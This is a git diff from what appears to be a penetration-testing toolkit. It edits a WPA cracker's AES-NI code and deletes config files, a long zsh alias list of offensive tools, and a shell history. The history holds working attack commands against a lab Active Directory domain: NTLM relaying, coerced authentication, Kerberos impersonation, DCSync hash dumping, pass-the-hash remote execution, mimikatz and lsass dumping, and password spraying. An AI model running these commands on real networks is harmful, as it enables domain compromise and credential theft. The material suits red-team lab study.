_mm_aeskeygenassist_si128(roundkey, 64)); -- state = _mm_aesenc_si128(state, roundkey); -- roundkey = aesni_key(roundkey, _mm_aeskeygenassist_si128(roundkey, 128)); -- state = _mm_aesenc_si128(state, roundkey); -- roundkey = aesni_key(roundkey, _mm_aeskeygenassist_si128(roundkey, 27)); -- state = _mm_aesenc_si128(state, roundkey); -- roundkey = aesni_key(roundkey, _mm_aeskeygenassist_si128(roundkey, 54)); -- state = _mm_aesenclast_si128 (state, roundkey); -- -- _mm_storeu_si128 (&((__m128i*)crib)[0], state); -- if (memcmp(crib, S0, 6) == 0) -- return i; -- } -- -- return -1; -- } --#endif /* COMPILE_AESNI */ -+//#ifdef COMPILE_AESNI -+// inline __m128i -+// aesni_key(__m128i a, __m128i b) -+// { -+// __m128i t; -+// -+// b = 
_mm_shuffle_epi32(b, 255); -+// t = _mm_slli_si128(a, 4); -+// a = _mm_xor_si128(a, t); -+// t = _mm_slli_si128(t, 4); -+// a = _mm_xor_si128(a, t); -+// t = _mm_slli_si128(t, 4); -+// a = _mm_xor_si128(a, t); -+// a = _mm_xor_si128(a, b); -+// -+// return a; -+// } -+// -+// static Py_ssize_t -+// ccmp_encrypt_aesni(const unsigned char *A0, const unsigned char *S0, const unsigned char *tkbuffer, Py_ssize_t keycount) -+// { -+// __m128i roundkey, state; -+// Py_ssize_t i; -+// unsigned char crib[16]; -+// -+// for (i = 0; i < keycount; i++) -+// { -+// /* Setup round key from main key */ -+// roundkey = _mm_loadu_si128((__m128i*)&tkbuffer[i * 16]); -+// -+// /* Get plaintext and XOR it with key to get AES-state */ -+// state = _mm_loadu_si128((__m128i*)A0); -+// state = _mm_xor_si128(state, roundkey); -+// -+// /* Perform 10 AES-rounds on the state using the derived round keys */ -+// roundkey = aesni_key(roundkey, _mm_aeskeygenassist_si128(roundkey, 1)); -+// state = _mm_aesenc_si128(state, roundkey); -+// roundkey = aesni_key(roundkey, _mm_aeskeygenassist_si128(roundkey, 2)); -+// state = _mm_aesenc_si128(state, roundkey); -+// roundkey = aesni_key(roundkey, _mm_aeskeygenassist_si128(roundkey, 4)); -+// state = _mm_aesenc_si128(state, roundkey); -+// roundkey = aesni_key(roundkey, _mm_aeskeygenassist_si128(roundkey, 8)); -+// state = _mm_aesenc_si128(state, roundkey); -+// roundkey = aesni_key(roundkey, _mm_aeskeygenassist_si128(roundkey, 16)); -+// state = _mm_aesenc_si128(state, roundkey); -+// roundkey = aesni_key(roundkey, _mm_aeskeygenassist_si128(roundkey, 32)); -+// state = _mm_aesenc_si128(state, roundkey); -+// roundkey = aesni_key(roundkey, _mm_aeskeygenassist_si128(roundkey, 64)); -+// state = _mm_aesenc_si128(state, roundkey); -+// roundkey = aesni_key(roundkey, _mm_aeskeygenassist_si128(roundkey, 128)); -+// state = _mm_aesenc_si128(state, roundkey); -+// roundkey = aesni_key(roundkey, _mm_aeskeygenassist_si128(roundkey, 27)); -+// state = 
_mm_aesenc_si128(state, roundkey); -+// roundkey = aesni_key(roundkey, _mm_aeskeygenassist_si128(roundkey, 54)); -+// state = _mm_aesenclast_si128 (state, roundkey); -+// -+// _mm_storeu_si128 (&((__m128i*)crib)[0], state); -+// if (memcmp(crib, S0, 6) == 0) -+// return i; -+// } -+// -+// return -1; -+// } -+//#endif /* COMPILE_AESNI */ - - PyDoc_STRVAR(CCMPCracker_solve__doc__, - "solve(object) -> solution or None\n\n" -diff --git a/cpyrit/cpufeatures.h b/cpyrit/cpufeatures.h -index 6f93d60..dfc1096 100644 ---- a/cpyrit/cpufeatures.h -+++ b/cpyrit/cpufeatures.h -@@ -33,8 +33,8 @@ - } - #endif - --#if (defined(__AES__) && defined(__PCLMUL__)) -- #define COMPILE_AESNI --#endif -+//#if (defined(__AES__) && defined(__PCLMUL__)) -+// #define COMPILE_AESNI -+//#endif - - #endif /* CPUFEATURES */ diff --git a/sources/proxychains/proxychains.conf b/sources/proxychains/proxychains.conf deleted file mode 100644 index 22a65be6..00000000 --- a/sources/proxychains/proxychains.conf +++ /dev/null @@ -1,154 +0,0 @@ -# proxychains.conf VER 4.x -# -# HTTP, SOCKS4a, SOCKS5 tunneling proxifier with DNS. - - -# The option below identifies how the ProxyList is treated. 
-# only one option should be uncommented at time, -# otherwise the last appearing option will be accepted -# -#dynamic_chain -# -# Dynamic - Each connection will be done via chained proxies -# all proxies chained in the order as they appear in the list -# at least one proxy must be online to play in chain -# (dead proxies are skipped) -# otherwise EINTR is returned to the app -# -strict_chain -# -# Strict - Each connection will be done via chained proxies -# all proxies chained in the order as they appear in the list -# all proxies must be online to play in chain -# otherwise EINTR is returned to the app -# -#round_robin_chain -# -# Round Robin - Each connection will be done via chained proxies -# of chain_len length -# all proxies chained in the order as they appear in the list -# at least one proxy must be online to play in chain -# (dead proxies are skipped). -# the start of the current proxy chain is the proxy after the last -# proxy in the previously invoked proxy chain. -# if the end of the proxy chain is reached while looking for proxies -# start at the beginning again. -# otherwise EINTR is returned to the app -# These semantics are not guaranteed in a multithreaded environment. -# -#random_chain -# -# Random - Each connection will be done via random proxy -# (or proxy chain, see chain_len) from the list. -# this option is good to test your IDS :) - -# Make sense only if random_chain or round_robin_chain -#chain_len = 2 - -# Quiet mode (no output from library) -#quiet_mode - -## Proxy DNS requests - no leak for DNS data -# (disable all of the 3 items below to not proxy your DNS requests) - -# method 1. this uses the proxychains4 style method to do remote dns: -# a thread is spawned that serves DNS requests and hands down an ip -# assigned from an internal list (via remote_dns_subset). 
-# this is the easiest (setup-wise) and fastest method, however on -# systems with buggy libcs and very complex software like webbrosers -# this might not work and/or cause crashes. -proxy_dns - -# method 2. use the old proxyresolv script to proxy DNS requests -# in proxychains 3.1 style. requires `proxyresolv` in $PATH -# plus a dynamically linked `dig` binary. -# this is a lot slower than `proxy_dns`, doesn't support .onion URLs, -# but might be more compatible with complex software like webbrowsers. -#proxy_dns_old - -# method 3. use proxychains4-daemon process to serve remote DNS requests. -# this is similar to the threaded `proxy_dns` method, however it requires -# that proxychains4-daemon is already running on the specified address. -# on the plus side it doesn't do malloc/threads so it should be quite -# compatible with complex, async-unsafe software. -# note that if you don't start proxychains4-daemon before using this, -# the process will simply hang. -#proxy_dns_daemon 127.0.0.1:1053 - -# set the class A subnet number to use for the internal remote DNS mapping -# we use the reserved 224.x.x.x range by default, -# if the proxified app does a DNS request, we will return an IP from that range. -# on further accesses to this ip we will send the saved DNS name to the proxy. -# in case some control-freak app checks the returned ip, and denies to -# connect, you can use another subnet, e.g. 10.x.x.x or 127.x.x.x. -# of course you should make sure that the proxified app does not need -# *real* access to this subnet. -# i.e. dont use the same subnet then in the localnet section -#remote_dns_subnet 127 -#remote_dns_subnet 10 -remote_dns_subnet 224 - -# Some timeouts in milliseconds -tcp_read_time_out 15000 -tcp_connect_time_out 8000 - -### Examples for localnet exclusion -## localnet ranges will *not* use a proxy to connect. 
-## Exclude connections to 192.168.1.0/24 with port 80 -# localnet 192.168.1.0:80/255.255.255.0 - -## Exclude connections to 192.168.100.0/24 -# localnet 192.168.100.0/255.255.255.0 - -## Exclude connections to ANYwhere with port 80 -# localnet 0.0.0.0:80/0.0.0.0 - -## RFC5735 Loopback address range -## if you enable this, you have to make sure remote_dns_subnet is not 127 -## you'll need to enable it if you want to use an application that -## connects to localhost. -# localnet 127.0.0.0/255.0.0.0 - -## RFC1918 Private Address Ranges -# localnet 10.0.0.0/255.0.0.0 -# localnet 172.16.0.0/255.240.0.0 -# localnet 192.168.0.0/255.255.0.0 - -### Examples for dnat -## Trying to proxy connections to destinations which are dnatted, -## will result in proxying connections to the new given destinations. -## Whenever I connect to 1.1.1.1 on port 1234 actually connect to 1.1.1.2 on port 443 -# dnat 1.1.1.1:1234 1.1.1.2:443 - -## Whenever I connect to 1.1.1.1 on port 443 actually connect to 1.1.1.2 on port 443 -## (no need to write :443 again) -# dnat 1.1.1.2:443 1.1.1.2 - -## No matter what port I connect to on 1.1.1.1 port actually connect to 1.1.1.2 on port 443 -# dnat 1.1.1.1 1.1.1.2:443 - -## Always, instead of connecting to 1.1.1.1, connect to 1.1.1.2 -# dnat 1.1.1.1 1.1.1.2 - -# ProxyList format -# type ip port [user pass] -# (values separated by 'tab' or 'blank') -# -# only numeric ipv4 addresses are valid -# -# -# Examples: -# -# socks5 192.168.67.78 1080 lamer secret -# http 192.168.89.3 8080 justu hidden -# socks4 192.168.1.49 1080 -# http 192.168.39.93 8080 -# -# -# proxy types: http, socks4, socks5, raw -# * raw: The traffic is simply forwarded to the proxy without modification. -# ( auth types supported: "basic"-http "user/pass"-socks ) -# -[ProxyList] -# add proxy here ... 
-socks4 127.0.0.1 1080 \ No newline at end of file diff --git a/sources/tmux/tmux.conf b/sources/tmux/tmux.conf deleted file mode 100644 index 987ceedf..00000000 --- a/sources/tmux/tmux.conf +++ /dev/null @@ -1,3 +0,0 @@ -set-option -g default-shell /bin/zsh - - diff --git a/sources/trilium/config.ini b/sources/trilium/config.ini deleted file mode 100644 index 0a862a40..00000000 --- a/sources/trilium/config.ini +++ /dev/null @@ -1,23 +0,0 @@ -[General] -# Instance name can be used to distinguish between different instances using backend api.getInstanceName() -instanceName= - -# set to true to allow using Trilium without authentication (makes sense for server build only, desktop build doesn't need password) -noAuthentication=false - -# set to true to disable backups (e.g. because of limited space on server) -noBackup=false - -# Disable automatically generating desktop icon -# noDesktopIcon=true - -[Network] -# host setting is relevant only for web deployments - set the host on which the server will listen -# host=0.0.0.0 -# port setting is relevant only for web deployments, desktop builds run on a fixed port (changeable with TRILIUM_PORT environment variable) -port=1991 -# true for TLS/SSL/HTTPS (secure), false for HTTP (unsecure). -https=false -# path to certificate (run "bash bin/generate-cert.sh" to generate self-signed certificate). 
Relevant only if https=true -certPath= -keyPath= diff --git a/sources/trilium/document.db b/sources/trilium/document.db deleted file mode 100644 index 0ff59a5f..00000000 Binary files a/sources/trilium/document.db and /dev/null differ diff --git a/sources/trilium/document.db-shm b/sources/trilium/document.db-shm deleted file mode 100644 index 96ec25ae..00000000 Binary files a/sources/trilium/document.db-shm and /dev/null differ diff --git a/sources/trilium/document.db-wal b/sources/trilium/document.db-wal deleted file mode 100644 index 8c07b8a9..00000000 Binary files a/sources/trilium/document.db-wal and /dev/null differ diff --git a/sources/zsh/aliases b/sources/zsh/aliases deleted file mode 100644 index 2e60e386..00000000 --- a/sources/zsh/aliases +++ /dev/null @@ -1,162 +0,0 @@ -#alias mitm6='python3 /opt/tools/mitm6/mitm6/mitm6.py' -alias l='ls -alh' -alias ipa='ip --brief --color a' -alias nse='ls /usr/share/nmap/scripts | grep ' -alias scan-range='nmap -T5 -n -sn' -alias http-server='python3 -m http.server' -alias php-server='php -S 127.0.0.1:8080 -t .' 
-alias ftp-server='python3 -m pyftpdlib -u "mario" -P "m4r10" -p 2121' -alias powershell='pwsh' -alias responder='python3 /opt/tools/Responder/Responder.py' -alias responder-http-on="sed -i 's/HTTP = Off/HTTP = On/g' /opt/tools/Responder/Responder.conf && cat /opt/tools/Responder/Responder.conf | grep --color=never 'HTTP ='" -alias responder-http-off="sed -i 's/HTTP = On/HTTP = Off/g' /opt/tools/Responder/Responder.conf && cat /opt/tools/Responder/Responder.conf | grep --color=never 'HTTP ='" -alias responder-smb-on="sed -i 's/SMB = Off/SMB = On/g' /opt/tools/Responder/Responder.conf && cat /opt/tools/Responder/Responder.conf | grep --color=never 'SMB ='" -alias responder-smb-off="sed -i 's/SMB = On/SMB = Off/g' /opt/tools/Responder/Responder.conf && cat /opt/tools/Responder/Responder.conf | grep --color=never 'SMB ='" -alias sublist3r='python3 /opt/tools/Sublist3r/sublist3r.py' -alias recondog='python3 /opt/tools/ReconDog/dog' -alias cloudfail='python3 /opt/tools/CloudFail/cloudfail.py' -alias oneforall='python3 /opt/tools/OneForAll/oneforall/oneforall.py' -alias eyewitness='python3 /opt/tools/EyeWitness/EyeWitness.py' -alias XSStrike='python3 /opt/tools/XSStrike/xsstrike.py' -alias bolt='python3 /opt/tools/Bolt/bolt.py' -alias ntlmrelayx='grc ntlmrelayx.py' -alias secretsdump='grc secretsdump.py' -alias bloodhound.py='python3 /opt/tools/BloodHound.py/bloodhound.py' -alias dementor.py='python /opt/tools/dementor/dementor.py' -alias grc='grc ' -alias ms14-068.py='python /opt/tools/pykek/ms14-068.py' -alias autorecon='/opt/tools/AutoRecon/autorecon.py -o autorecon' -alias linkfinder='python3 /opt/tools/LinkFinder/linkfinder.py' -alias ssrfmap='cd /opt/tools/SSRFmap && echo "[*] changed dir : cd /opt/tools/SSRFmap/" && python3 /opt/tools/SSRFmap/ssrfmap.py' -alias nosqlmap='python2 /opt/tools/NoSQLMap/nosqlmap.py' -alias fuxploider='cd /opt/tools/fuxploider && echo "[*] changed dir : cd /opt/tools/fuxploider/" && python3 fuxploider.py' -alias corscanner='python3 
/opt/tools/CORScanner/cors_scan.py' -alias blazy='python /opt/tools/Blazy/blazy.py' -alias icebreaker='cd /opt/tools/icebreaker/ && echo "[*] changed dir : cd /opt/tools/icebreaker/" && echo "[*] Run: pipenv --shell Then: python3 icebreaker.py"' -alias empire='cd /opt/tools/Empire/ && echo "[*] changed dir : cd /opt/tools/Empire/" && python3 empire' -alias deathstar='python3 /opt/tools/DeathStar/DeathStar.py' -alias privexchange.py='python3 /opt/tools/PrivExchange/privexchange.py' -alias lnk-generate.py='python /opt/tools/LNKUp/generate.py' -alias gdb='gdb -q' -alias darkarmour='cd /opt/tools/darkarmour/ && echo "[*] changed dir : cd /opt/tools/darkarmour/" && python3 darkarmour.py' -alias fzf-wordlists='find /usr/share/seclists /usr/share/wordlists /usr/share/dirbuster /usr/share/wfuzz /usr/share/dirb -type f | fzf' -alias kadimus='cd /opt/tools/Kadimus && echo "[*] changed dir : cd /opt/tools/Kadimus/" && /opt/tools/Kadimus/kadimus' -alias fimap='/opt/tools/fimap/src/fimap.py' -alias jwt_tool='python3 /opt/tools/jwt_tool/jwt_tool.py' -alias rbcd-attack='python3 /opt/tools/rbcd-attack/rbcd.py' -alias addspn.py='python3 /opt/tools/krbrelayx/addspn.py' -alias dnstool.py='python /opt/tools/krbrelayx/dnstool.py' -alias printerbug.py='python3 /opt/tools/krbrelayx/printerbug.py' -alias krbrelayx.py='python3 /opt/tools/krbrelayx/krbrelayx.py' -alias urlencode='python -c "import sys, urllib as ul; print ul.quote_plus(sys.argv[1])"' -alias urldecode='python -c "import sys, urllib as ul; print ul.unquote_plus(sys.argv[1])"' -alias enyx='python /opt/tools/Enyx/enyx.py' -alias starkiller='echo "Starkiller has a GUI, cant run on exegol: run empire-rest on exegol, then starkiller on host"' -alias empire-rest='empire --rest --username admin --password admin' -alias enum4linux-ng='/opt/tools/enum4linux-ng/enum4linux-ng.py' -alias git-dumper='/opt/tools/git-dumper/git_dumper.py' -alias gopherus='/opt/tools/Gopherus/gopherus.py' -alias ysoserial='java -jar 
/opt/tools/ysoserial/ysoserial.jar' -alias john='/opt/tools/john/run/john' -alias zerologon-exploit='python3 /opt/tools/zerologon-exploit/cve-2020-1472-exploit.py' -alias zerologon-scan='python3 /opt/tools/zerologon-scan/zerologon_tester.py' -alias zerologon-restore='python3 /opt/tools/zerologon-exploit/restorepassword.py' -alias a='/opt/tools/arsenal/run' -alias bloodhound='/opt/tools/BloodHound4/BloodHound-linux-x64/BloodHound --no-sandbox --disable-dev-shm-usage' -alias bloodhound_old_v3='/opt/tools/BloodHound3/BloodHound --no-sandbox --disable-dev-shm-usage' -alias bloodhound_old_v2='/opt/tools/BloodHound2/BloodHound --no-sandbox --disable-dev-shm-usage' -alias rickroll='curl tiredand.gay/rick' -alias gitdumper='/opt/tools/GitTools/Dumper/gitdumper.sh' -alias bettercap-ui='bettercap -caplet http-ui' -alias xcopy='xsel --clipboard <' -alias xpaste='xsel --clipboard >' -alias xshow='xsel --clipboard' -alias infoga.py='python /opt/tools/Infoga/infoga.py' -alias oaburl.py='python3 /opt/tools/OABUrl/oaburl.py' -alias oabextract='/opt/tools/libmspack/libmspack/examples/oabextract' -alias ruler='/opt/tools/ruler/ruler' -alias ghidra='/opt/tools/ghidra_9.2.3_PUBLIC/ghidraRun' -alias cypheroth='/opt/tools/cypheroth/cypheroth.sh' -alias sherlock='python3 /opt/tools/sherlock/sherlock/sherlock.py' -alias sed-empty-line='sed /^$/d' -alias xmlcat='xmllint --format' -alias http-put-server='python3 /opt/resources/linux/http-put-server.py --bind 0.0.0.0' -alias rbcd-permissions='python3 /opt/tools/rbcd_permissions/rbcd.py' -alias trilium-start='echo "Starting server on http://$(cat ~/.local/share/trilium-data/config.ini | grep host= | cut -d = -f 2):$(cat ~/.local/share/trilium-data/config.ini | grep port= | cut -d = -f 2)/" && nohup node /opt/tools/trilium/src/www &> ~/.trilium.nohup.out &' -alias trilium-stop='fuser -k $(cat ~/.local/share/trilium-data/config.ini | grep port= | cut -d = -f 2)/tcp' -alias ntlmv1-multi='python3 /opt/tools/ntlmv1-multi/ntlmv1.py' -alias 
SimplyEmail='cd /opt/tools/SimplyEmail/ && echo "[*] changed dir : cd /opt/tools/SimplyEmail/" && python SimplyEmail.py' -alias linkedin2username.py='python3 /opt/tools/linkedin2username/linkedin2username.py' -alias toutatis.py='python3 /opt/tools/toutatis/toutatis.py' -alias carbon14.py='python3 /opt/tools/Carbon14/carbon14.py' -alias gephi='/opt/tools/gephi/bin/gephi' -alias WikiLeaker='python3 /opt/tools/WikiLeaker/WikiLeaker.py' -alias photon.py='python3 /opt/tools/photon/photon.py' -alias cloudfail.py='cd /opt/tools/CloudFail/ && echo "[*] changed dir : cd /opt/tools/CloudFail/" && python3 cloudfail.py' -alias constellation='/opt/tools/constellation/bin/constellation' -alias osintgram='cd /opt/tools/Osintgram/ && echo "[*] changed dir : cd /opt/tools/Osintgram/" && python3 main.py' -alias pwnedornot.py='python3 /opt/tools/pwnedOrNot/pwnedornot.py' -alias ghunt='cd /opt/tools/GHunt/ && echo "[*] changed dir : cd /opt/tools/GHunt/" && python3 hunt.py ' -alias ghunt-config='cd /opt/tools/GHunt/ && echo "[*] changed dir : cd /opt/tools/GHunt/" && python3 check_and_gen.py' -alias mfdread='python3 /opt/tools/mfdread/mfdread.py' -alias libnfc_crypto1_crack='/opt/tools/crypto1_bs/libnfc_crypto1_crack' -alias nrf24-continuous-tone-test.py='/opt/tools/mousejack/nrf-research-firmware/tools/nrf24-continuous-tone-test.py' -alias nrf24-network-mapper.py='/opt/tools/mousejack/nrf-research-firmware/tools/nrf24-network-mapper.py' -alias nrf24-scanner.py='/opt/tools/mousejack/nrf-research-firmware/tools/nrf24-scanner.py' -alias nrf24-sniffer.py='/opt/tools/mousejack/nrf-research-firmware/tools/nrf24-sniffer.py' -alias proxychains4='proxychains4 ' -alias proxychains='proxychains4 ' -alias testssl='/opt/tools/testssl.sh/testssl.sh' -alias multirelay='python3 /opt/tools/Responder/tools/MultiRelay.py' -alias runfinger='python3 /opt/tools/Responder/tools/RunFinger.py' -alias phpggc='/opt/tools/phpggc/phpggc' -alias 
secret_fragment_exploit.py='/opt/tools/symfony-exploits/secret_fragment_exploit.py' -alias cachedump.py='/opt/tools/creddump/cachedump.py' -alias lsadump.py='/opt/tools/creddump/lsadump.py' -alias pwdump.py='/opt/tools/creddump/pwdump.py' -alias jdwp-shellifier.py='/opt/tools/jdwp-shellifier/jdwp-shellifier.py' -alias dnschef='/opt/tools/dnschef/dnschef.py' -alias h2csmuggler='/opt/tools/h2csmuggler/h2csmuggler.py' -alias byp4xx='python3 /opt/tools/byp4xx/byp4xx.py' -alias volatility='python /opt/tools/volatility/vol.py' -alias vol='volatility' -alias pygpoabuse='python3 /opt/tools/pyGPOAbuse/pygpoabuse.py' -alias rsactftool='python3 /opt/tools/RsaCtfTool/RsaCtfTool.py' -alias bloodhound-quickwin='python3 /opt/tools/bloodhound-quickwin/bhqc.py' -alias bhqc.py='python3 /opt/tools/bloodhound-quickwin/bhqc.py' -alias cme='grc crackmapexec' -alias airodump-ng='airodump-ng --wps' -alias ntlm-scanner='/opt/tools/ntlm-scanner/scan.py' -alias ldapsearch-ad='python3 /opt/tools/ldapsearch-ad/ldapsearch-ad.py' -alias Get-GPPPassword='grc Get-GPPPassword.py' -alias trid='LC_ALL=C /opt/tools/trid/trid' -alias PCredz='python3 /opt/tools/PCredz/Pcredz' -alias rbcd='grc rbcd.py' -alias tomcatWarDeployer='python /opt/tools/tomcatWarDeployer/tomcatWarDeployer.py' -alias moodlescan='python3 /opt/tools/moodlescan/moodlescan.py' -alias rsf='python3 /opt/tools/routersploit/rsf.py' -alias petitpotam.py='python3 /opt/tools/PetitPotam/PetitPotam.py' -alias getnthash.py='python3 /opt/tools/PKINITtools/getnthash.py' -alias gets4uticket.py='python3 /opt/tools/PKINITtools/gets4uticket.py' -alias gettgtpkinit.py='python3 /opt/tools/PKINITtools/gettgtpkinit.py' -alias pywhisker.py='python3 /opt/tools/pywhisker/pywhisker.py' -alias targetedKerberoast.py='python3 /opt/tools/targetedKerberoast/targetedKerberoast.py' -alias pywsus.py='python3 /opt/tools/pywsus/pywsus.py' -alias krbrelayx='grc krbrelayx.py' -alias DonPAPI='python3 /opt/tools/DonPAPI/DonPAPI.py' -alias eaphammer='python3 
/opt/tools/eaphammer/eaphammer' -alias describeTicket='grc describeTicket.py' -alias vulny-code-static-analysis='python3 /opt/tools/Vulny-Code-Static-Analysis/index.py' -alias php-code-analysis='python3 /opt/tools/Vulny-Code-Static-Analysis/index.py' -alias GPOwned='python3 /opt/tools/GPOwned/GPOwned.py' -alias pwndb='python3 /opt/tools/pwndb/pwndb.py' -alias shadowcoerce.py='/opt/tools/ShadowCoerce/shadowcoerce.py' -alias dcsync.py='python3 /opt/tools/DCSync/dcsync.py' -alias gMSADumper.py='python3 /opt/tools/gMSADumper/gMSADumper.py' -alias modifyCertTemplate.py='python3 /opt/tools/modifyCertTemplate/modifyCertTemplate.py' -alias cme-neo4j-enable='sed -i "s/bh_enabled = False/bh_enabled = True/" ~/.cme/cme.conf' -alias cme-neo4j-disable='sed -i "s/bh_enabled = True/bh_enabled = False/" ~/.cme/cme.conf' -alias pyLAPS.py='python3 /opt/tools/pyLAPS/pyLAPS.py' -alias FindUncommonShares.py='python3 /opt/tools/FindUncommonShares/FindUncommonShares.py' -alias LdapRelayScan.py='python3 /opt/tools/LdapRelayScan/LdapRelayScan.py' -alias goldencopy.py='python3 /opt/tools/GoldenCopy/goldencopy.py' \ No newline at end of file diff --git a/sources/zsh/history b/sources/zsh/history deleted file mode 100644 index 89c11021..00000000 --- a/sources/zsh/history +++ /dev/null @@ -1,342 +0,0 @@ -responder --interface eth0 --analyze --disable-ess -responder --interface eth0 --wpad --lm --disable-ess -responder-http-off -responder-http-on -responder-smb-off -responder-smb-on -bloodhound.py -c All -d breaking.bad -u anonymous -p anonymous -dc DC01.BREAKING.BAD -bloodhound.py -c All -d breaking.bad -u anonymous --hashes 'ffffffffffffffffffffffffffffffff':'a88baa3fdc8f581ee0fb05d7054d43e4' -dc DC01.BREAKING.BAD -nslookup _ldap._tcp.dc._msdcs.BREAKING.BAD -nslookup -type=srv _kerberos._tcp.BREAKING.BAD -nslookup -type=srv _gc._tcp.BREAKING.BAD -nslookup -type=srv _kpasswd._tcp.BREAKING.BAD -nslookup -type=srv _ldap._tcp.BREAKING.BAD -nslookup -type=srv _ldap._tcp.dc._msdcs.BREAKING.BAD 
-nbtscan -r 192.168.56.0/24 -nmap --script dns-srv-enum --script-args dns-srv-enum.domain=BREAKING.BAD -mount -o domain='BREAKING.BAD' -o username='someuser' -o password='somepassword' -t cifs '//DC01.BREAKING.BAD/SYSVOL' /tmp/mnttarget/ -rpcdump.py DC01.BREAKING.BAD | grep -A 6 MS-RPRN -rpcdump.py DC02.BREAKING.BAD | grep -A 6 MS-RPRN -dementor.py -d breaking.bad -u anonymous -p anonymous 192.168.56.1 DC02.BREAKING.BAD -printerbug.py "breaking.bad"/"anonymous":"anonymous"@"DC02.BREAKING.BAD" 192.168.56.1 -ntlmrelayx -t ldaps://DC01.BREAKING.BAD -smb2support --add-computer SHUTDOWN --delegate-access -ntlmrelayx -t ldaps://DC01.BREAKING.BAD -smb2support --remove-mic --add-computer SHUTDOWN --delegate-access -ntlmrelayx -t ldaps://DC01.BREAKING.BAD -smb2support --remove-mic --add-computer SHUTDOWN 123soleil --delegate-access -ntlmrelayx -t ldap://DC01.BREAKING.BAD -smb2support --escalate-user SHUTDOWN -curl --ntlm -u "someuser":"somepassword" 127.0.0.1 -getST.py -spn host/SV01.BREAKING.BAD -impersonate Administrator -dc-ip 192.168.56.101 BREAKING.BAD/'SHUTDOWN$':123soleil -getST.py -force-forwardable -spn host/SV01.BREAKING.BAD -impersonate Administrator -dc-ip 192.168.56.101 -hashes :01234567890sv01nthash01234567890 BREAKING.BAD/SV01 -secretsdump -k -outputfile BREAKING.BAD DC02.BREAKING.BAD -secretsdump -outputfile BREAKING.BAD -just-dc -hashes :a88baa3fdc8f581ee0fb05d7054d43e4 BREAKING.BAD/Administrator@dc01.breaking.bad -secretsdump -just-dc -hashes :a88baa3fdc8f581ee0fb05d7054d43e4 BREAKING.BAD/Administrator@dc01.breaking.bad -rpcclient -U '' -N DC01.BREAKING.BAD -rpcclient -U BREAKING/anonymous 192.168.56.101 -pth-net rpc group members 'Domain admins' -U 'BREAKING.BAD'/'Administrator'%'ffffffffffffffffffffffffffffffff':'a88baa3fdc8f581ee0fb05d7054d43e4' -S 'DC01.BREAKING.BAD' -pth-net rpc group addmem 'Domain admins' 'Shutdown' -U 'BREAKING.BAD'/'Administrator'%'ffffffffffffffffffffffffffffffff':'a88baa3fdc8f581ee0fb05d7054d43e4' -S 'DC01.BREAKING.BAD' -cme smb 
192.168.56.0/24 --gen-relay-list smb_targets.txt -mitm6 --interface eth0 -mitm6 --interface eth0 --domain BREAKING.BAD -responder --interface eth0 --wpad --lm --ProxyAuth --disable-ess -ntlmrelayx -tf targets.txt -w -6 -smb2support -socks -proxychains secretsdump -no-pass BREAKING/Administrator@SV01.BREAKING.BAD -proxychains smbexec.py -no-pass BREAKING/Administrator@SV01.BREAKING.BAD -proxychains psexec.py -no-pass BREAKING/Administrator@SV01.BREAKING.BAD -proxychains atexec.py -no-pass BREAKING/Administrator@SV01.BREAKING.BAD -proxychains wmiexec.py -no-pass BREAKING/Administrator@SV01.BREAKING.BAD -proxychains dcomexec.py -no-pass BREAKING/Administrator@SV01.BREAKING.BAD -proxychains lsassy -d BREAKING.BAD -u Administrator -p 'p@ssword' -K lsass_loot -o lsass_creds.txt SV01.BREAKING.BAD -psexec.py -hashes :a88baa3fdc8f581ee0fb05d7054d43e4 BREAKING.BAD/Administrator@SV01.BREAKING.BAD -smbexec.py -hashes :a88baa3fdc8f581ee0fb05d7054d43e4 BREAKING.BAD/Administrator@SV01.BREAKING.BAD -wmiexec.py -hashes :a88baa3fdc8f581ee0fb05d7054d43e4 BREAKING.BAD/Administrator@SV01.BREAKING.BAD -wmiexec.py -codec cp850 -hashes :a88baa3fdc8f581ee0fb05d7054d43e4 BREAKING.BAD/Administrator@SV01.BREAKING.BAD -atexec.py -hashes :a88baa3fdc8f581ee0fb05d7054d43e4 BREAKING.BAD/Administrator@SV01.BREAKING.BAD -dcomexec.py -hashes :a88baa3fdc8f581ee0fb05d7054d43e4 BREAKING.BAD/Administrator@SV01.BREAKING.BAD -dcomexec.py -hashes :a88baa3fdc8f581ee0fb05d7054d43e4 BREAKING.BAD/Administrator@SV01.BREAKING.BAD -cme smb 192.168.56.101 --local-auth -u Administrator -H a88baa3fdc8f581ee0fb05d7054d43e4 -M enum_avproducts -cme smb 192.168.56.101 --local-auth -u Administrator -H a88baa3fdc8f581ee0fb05d7054d43e4 -M mimikatz -cme smb 192.168.56.0/24 --local-auth -u Administrator -H a88baa3fdc8f581ee0fb05d7054d43e4 -M lsassy -cme smb 192.168.56.0/24 --local-auth -u Administrator -H a88baa3fdc8f581ee0fb05d7054d43e4 -M lsassy -o BLOODHOUND=True NEO4JUSER=neo4j NEO4JPASS=exegol4thewin -sprayhound -d 
'BREAKING.BAD' -dc 'DC01.BREAKING.BAD' -nu 'neo4j' -np 'exegol4thewin' -lu 'anonymous' -lp 'anonymous' -p 'azerty' -sprayhound -d 'BREAKING.BAD' -dc 'DC01.BREAKING.BAD' -nu 'neo4j' -np 'exegol4thewin' -lu 'anonymous' -lp 'anonymous' -lsassy -v -u 'Administrator' -H a88baa3fdc8f581ee0fb05d7054d43e4 -K lsass_loot -o lsass_creds.txt 192.168.56.0/24 -lsassy -v -d 'BREAKING.BAD' -u 'Administrator' -p 'passw0rd' -K lsass_loot -o lsass_creds.txt 192.168.56.0/24 -export KRB5CCNAME=Administrator.ccache -lsassy -k -d BREAKING.BAD -u Administrator -K lsass_loot -o lsass_creds.txt SV01.BREAKING.BAD -masscan -v -p 1-65535 --rate=10000 -e eth0 192.168.56.0/24 -masscan -v -p 1-65535,U:1-65535 --rate=10000 -e eth0 192.168.56.0/24 -gobuster dir -w `fzf-wordlists` -u http://192.168.56.0:8000/ -kr scan hosts.txt -A=apiroutes-210328:20000 -x 5 -j 100 --fail-status-codes 400,401,404,403,501,502,426,411 -kr scan target.com -w routes.kite -A=apiroutes-210328:20000 -x 20 -j 1 --fail-status-codes 400,401,404,403,501,502,426,411 -kr brute https://target.com/subapp/ -A=aspx-210328:20000 -x 20 -j 1 -kr brute https://target.com/subapp/ -w dirsearch.txt -x 20 -j 1 -exml,asp,aspx,ashx -D -kr scan https://target.com:8443/ -w /opt/tools/kiterunner/routes-large.kite -A=apiroutes-210228:20000 -x 10 --ignore-length=34 -kr scan target.com -w /opt/tools/kiterunner/routes-large.kite -A=apiroutes-210228:20000 -x 10 --ignore-length=34 -kr scan targets.txt -w 